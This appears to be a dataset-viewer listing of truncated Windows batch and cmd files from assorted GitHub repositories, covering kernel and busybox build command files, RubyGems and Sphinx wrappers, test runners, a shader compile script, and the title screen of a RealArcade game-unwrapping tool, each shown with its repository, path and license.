cmd_libbb/chomp.o := gcc -Wp,-MD,libbb/.chomp.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D"BB_VER=KBUILD_STR(1.18.4)" -DBB_BT=AUTOCONF_TIMESTAMP -Wall -Wshadow -Wwrite-strings -Wundef -Wstrict-prototypes -Wunu... | muthumani2/Muthu-busybox | libbb/.chomp.o.cmd | bat | gpl-2.0 | 9,331 |
:""||{ ""=> %q<-*- ruby -*-
@"%~dp0ruby" -x "%~f0" %*
@exit /b %ERRORLEVEL%
};{#
bindir="${0%/*}" #
exec "$bindir/ruby" "-x" "$0" "$@" #
>,
}
#!/usr/bin/env ruby
#
# This file was generated by RubyGems.
#
# The application 'rdoc' is installed as part of a gem, and
# this file is here to facilitate running it.
#
requir... | Feuerwehrsport/wettkampf-manager-building-tools | ruby_windows/bin/rdoc.cmd | bat | gpl-2.0 | 656 |
cmd_procps/sysctl.o := gcc -Wp,-MD,procps/.sysctl.o.d -std=gnu99 -Iinclude -Ilibbb -include include/autoconf.h -D_GNU_SOURCE -DNDEBUG -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -D"BB_VER=KBUILD_STR(1.18.4)" -DBB_BT=AUTOCONF_TIMESTAMP -Wall -Wshadow -Wwrite-strings -Wundef -Wstrict-prototypes -... | muthumani2/Muthu-busybox | procps/.sysctl.o.cmd | bat | gpl-2.0 | 9,403 |
set sample=%1
echo Challenge 121-1I: Sample %sample%
echo ==========================
echo.
echo Input
echo -----
type sample%sample%.dat
echo.
echo.
if not exist sample%sample%.txt goto actualOutput
echo Expected output
echo ---------------
type sample%sample%.txt
echo.
:actualOutput
echo Actual output
... | powder96/rdailyprogrammer | Challenge_121-1I/Release/run-sample.cmd | bat | gpl-3.0 | 391 |
@echo off
title RealArcade Wrapper Killer v%rawkver% (.-+'~^-+ Game Already Unwrapped +-^~`+-.) [...cRypTiCwaRe 2o2o...]
if %testmode%==1 (
echo [core_game_unpacked_ok : loaded]
pause>nul
)
color 0a
set vertext=Not Verified
call "core_clean_main.cmd"
cls
echo Game Loaded: %GameName%
echo.
echo.
echo.
echo -... | esc0rtd3w/realarcade-wrapper-killer | src/core_game_unpacked_ok.cmd | bat | gpl-3.0 | 767 |
cmd_/scratch/janisjo/arm-linux-lite/obj/linux-2011.03-41-arm-none-linux-gnueabi-i686-pc-linux-gnu/tmp-install/include/linux/byteorder/.install := perl scripts/headers_install.pl /scratch/janisjo/arm-linux-lite/obj/linux-2011.03-41-arm-none-linux-gnueabi-i686-pc-linux-gnu/include/linux/byteorder /scratch/janisjo/arm-lin... | javilonas/NCam | cross/Toolchain-Matrix/arm-none-linux-gnueabi/libc/usr/include/linux/byteorder/..install.cmd | bat | gpl-3.0 | 891 |
vcpkg install immer:x86-windows immer:x64-windows immer:x86-windows-static immer:x64-windows-static
pause
| myd7349/Ongoing-Study | cpp/CMake/vcpkg/immer_test/install-windows.bat | bat | lgpl-3.0 | 106 |
cd Source
fbc -dll -x ../Bin/FBAudio.dll DllAudio.bas
cd ../ | monobogdan/Free-Basic-Audio | Make.bat | bat | lgpl-3.0 | 63 |
REM Copyright 2014 Steve Francia
REM
REM Licensed under the Apache License, Version 2.0 (the "License");
REM you may not use this file except in compliance with the License.
REM You may obtain a copy of the License at
REM
REM http://www.apache.org/licenses/LICENSE-2.0
REM
REM Unless required by... | all3n/spf13-vim | spf13-vim-windows-install.cmd | bat | apache-2.0 | 1,899 |
@echo off
rem -------------------------------------------------------------------------
rem JBoss Cluster FrameWork Demo Bootstrap Script for Windows
rem -------------------------------------------------------------------------
@if not "%ECHO%" == "" echo %ECHO%
@if "%OS%" == "Windows_NT" setlocal
if "%OS%" == "Win... | jbosschina/cluster | build/kits/bin/jbosscache.bat | bat | apache-2.0 | 1,673 |
@echo off
start "alias - C:\Program Files\Beyond Compare 2\BC2.exe" "C:\Program Files\Beyond Compare 2\BC2.exe" %*
| greenlaw110/winenv | alias/bc2.bat | bat | bsd-2-clause | 124 |
@echo off
if not exist ..\..\config.bat (
echo "FRESteamWorks/config.bat is not set up!"
goto :eof
)
call ..\..\config.bat
call "%FLEX_SDK%/bin/amxmlc" -swf-version=11 ^
-define=CONFIG::linux,false ^
-external-library-path+=../../lib/bin/FRESteamWorks.ane ^
-output FRESteamWorksTest.swf ../src/FRES... | Ventero/FRESteamWorks | test/bin-debug/build.bat | bat | bsd-2-clause | 337 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS... | BeerTheorySociety/timetable | docs/make.bat | bat | bsd-3-clause | 7,738 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OXCPRPT.S04_StreamForErrorCodeTable_TestSuite.MSOXCPRPT_S04_StreamForErrorCodeTable_TestSuite1 /testcontainer:..\..\MS-OXCPRPT\TestSuite\bin\Debug\MS-OXCPRPT_TestSuite.dll /runconfig:..\..\MS-OXCPRPT\MS-OXCPRPT.testsettings /u... | XinwLi/Interop-TestSuites-1 | ExchangeMAPI/Source/Scripts/MS-OXCPRPT/RunMSOXCPRPT_S04_StreamForErrorCodeTable_TestSuite1.cmd | bat | mit | 331 |
@echo off
rem THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
rem ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO
rem THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
rem PARTICULAR PURPOSE.
rem
rem Copyright (c) Microsoft Corporation. All rights reserved.
setlocal
s... | amecky/diesel | examples/triangle/compile_shaders.cmd | bat | mit | 860 |
cmd_sound/core/snd-pcm.o := arm-eabi-ld -EL -r -o sound/core/snd-pcm.o sound/core/pcm.o sound/core/pcm_native.o sound/core/pcm_lib.o sound/core/pcm_timer.o sound/core/pcm_misc.o sound/core/pcm_memory.o
| R-M-S/RMS_DragunKernel_V.11-MAX-9-3-2012_3.0.42 | sound/core/.snd-pcm.o.cmd | bat | gpl-2.0 | 206 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.